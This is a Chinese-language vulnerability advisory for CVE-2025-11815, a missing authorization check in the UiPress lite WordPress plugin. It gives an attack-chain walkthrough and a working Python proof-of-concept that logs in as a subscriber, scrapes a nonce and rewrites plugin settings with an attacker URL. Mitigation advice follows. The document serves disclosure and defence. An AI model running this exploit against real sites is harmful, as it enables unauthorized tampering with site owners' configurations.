CVE-2025-11815 UiPress lite插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11815

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

UiPress lite WordPress插件

漏洞概述

UiPress lite是一款流行的WordPress仪表盘定制插件，允许用户轻松创建自定义仪表盘、管理员主题和页面。该插件在3.5.08及以下所有版本中存在严重的权限绕过漏洞。漏洞根源在于插件的AJAX处理函数uip_save_site_option()缺少适当的权限验证检查，导致任何已认证用户（包括最低权限的订阅者角色）都可以调用该函数修改任意插件设置。攻击者利用此漏洞可以修改插件配置、可能获取敏感信息或在某些情况下实现进一步的攻击。由于WordPress的订阅者角色通常用于允许用户订阅内容或评论，因此此漏洞影响范围广泛，几乎所有使用该插件的WordPress网站都面临风险。漏洞于2025年11月21日被Wordfence安全团队发现并披露。

技术细节

该漏洞属于CWE-862（缺少授权检查）类型。问题出在插件的admin/core/ajax-functions.php文件第396行附近的uip_save_site_option()函数。该函数直接处理通过AJAX发送的请求，但未调用current_user_can()或require_admin()等权限验证函数来检查当前用户是否有权限修改站点选项。在WordPress中，修改站点选项通常需要管理员权限，但此函数允许任何已认证用户（包括订阅者角色）执行。攻击者可以通过构造AJAX请求，指定要修改的选项键和值，绕过权限检查修改任意插件设置。攻击者还可能利用其他受影响的AJAX操作进行组合攻击。此漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N，表明攻击复杂度低、所需权限低，但不影响机密性和可用性，仅影响部分完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用的WordPress版本和UiPress lite插件版本，确认版本小于等于3.5.08

STEP 2

2. 获取访问权限

攻击者获取目标WordPress网站的账户（订阅者级别或更高权限），或利用其他漏洞获取低权限账户

STEP 3

3. 获取Nonce

攻击者访问WordPress后台页面或AJAX端点，提取用于CSRF防护的nonce值

STEP 4

4. 构造恶意请求

攻击者构造包含action=uip_save_site_option的AJAX请求，指定要修改的选项名称和恶意值

STEP 5

5. 执行攻击

攻击者以低权限用户身份发送AJAX请求，由于函数缺少权限检查，服务器执行设置修改操作

STEP 6

6. 利用修改后的设置

根据修改的设置类型，攻击者可能实现XSS攻击、获取敏感信息或进一步提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-11815 PoC - UiPress lite Unauthorized Plugin Settings Modification
# Target: WordPress site with UiPress lite plugin <= 3.5.08

target_url = "http://target-wordpress-site.com"
# Authenticated user with subscriber role or higher
username = "subscriber_user"
password = "user_password"

def get_nonce(wordpress_url):
    """Get WordPress nonce for AJAX requests"""
    login_url = f"{wordpress_url}/wp-login.php"
    session = requests.Session()
    
    # Login to WordPress
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{wordpress_url}/wp-admin/",
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    
    # Get nonce from admin page or AJAX API
    admin_url = f"{wordpress_url}/wp-admin/admin-ajax.php"
    nonce_response = session.get(f"{wordpress_url}/wp-admin/admin.php?page=uipress", headers={'X-Requested-With': 'XMLHttpRequest'})
    
    # Extract nonce (typical WordPress nonce pattern)
    import re
    nonce_match = re.search(r'nonce["\']?\s*:\s*["\']([a-zA-Z0-9]+)["\']', nonce_response.text)
    nonce = nonce_match.group(1) if nonce_match else input("Enter nonce manually: ")
    
    return session, admin_url, nonce

def exploit_uip_save_site_option(session, ajax_url, nonce):
    """Exploit the missing capability check in uip_save_site_option()"""
    
    # Payload to modify plugin settings
    payload = {
        'action': 'uip_save_site_option',
        'security': nonce,
        'optionName': 'uip_custom_admin_logo',  # Example setting
        'optionValue': 'https://malicious-site.com/logo.png'
    }
    
    response = session.post(ajax_url, data=payload)
    return response.json()

def main():
    print("CVE-2025-11815 UiPress lite Exploitation")
    print("=" * 50)
    
    session, ajax_url, nonce = get_nonce(target_url)
    
    print(f"[*] Logged in as: {username}")
    print(f"[*] Attempting to modify plugin settings...")
    
    result = exploit_uip_save_site_option(session, ajax_url, nonce)
    
    print(f"[*] Response: {json.dumps(result, indent=2)}")
    
    if result.get('success'):
        print("[+] Successfully modified plugin settings!")
    else:
        print("[-] Exploitation failed or nonce invalid")

if __name__ == "__main__":
    main()

影响范围

UiPress lite plugin <= 3.5.08 (所有版本)

防御指南

临时缓解措施

如果无法立即升级插件，可以暂时禁用UiPress lite插件，或使用Web应用防火墙（WAF）规则阻止对admin-ajax.php的异常请求，特别是包含uip_save_site_option等UiPress相关action参数的请求。同时审查所有具有订阅者权限的用户账户，确保没有可疑账户存在。